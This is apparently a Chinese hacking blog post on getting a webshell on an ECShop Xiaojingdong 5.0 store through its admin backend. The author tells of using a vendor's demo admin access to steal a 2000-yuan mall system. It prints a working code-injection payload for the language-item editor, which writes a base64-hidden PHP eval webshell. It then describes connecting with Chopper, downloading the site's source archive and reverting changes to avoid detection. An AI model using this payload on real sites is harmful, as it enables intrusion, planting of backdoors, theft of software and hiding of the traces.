新年
快乐

垃圾堆中的精品

垃圾堆中的精品

ECSHOP小京东5.0已知后台拿Shell

开始先说一下,万恶的ecshop,又来了。呃呃呃、谁让它方便呢?废话不多说。最近手头有个要商城+云购的系统。万事百度先,一看云购和商城基本都是分开的,遂想谁这么无语,做这么个东西,BUT无奈,只能转站论坛找找,一段时间后,无果,看来只能上马大哥的某宝了。。。果不其然,居然搜到一个,找客服拿后台,测试了下,发现还不错,拿到手需要改改就好了。一问价才知道,在天朝这地方居然要跟我要2000大洋~!对一个穷鬼来说就有了下面的东西。

拿到后台。经典的小京东v5.0

image

后台模板编辑—>语言项编辑

user.php   搜索:状态

模板管理–语言项编辑

如:user.php 搜索:状态

image

插入${${fputs(fopen(base64_decode(ZnVjay5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbZnVja10pPz4))}}

访问http://网站/languages/zh_cn/user.php

然后菜刀连上一句话:http://网站/languages/zh_cn/fuck.php   一句话【fuck】

 

完美一句话。准备上传大马,然后打包下载源码,但!但!但!  我在根目录发现了个压缩包,感叹原来站长解压后连压缩包都没删除。便宜我了。直接下载,拿走。都不用导数据库的。

image

 

PS:切忌!最后一步,再到语言项编辑里面把修改的地方还原,然后移动一句话,避免被发现。

评论回复

回到顶部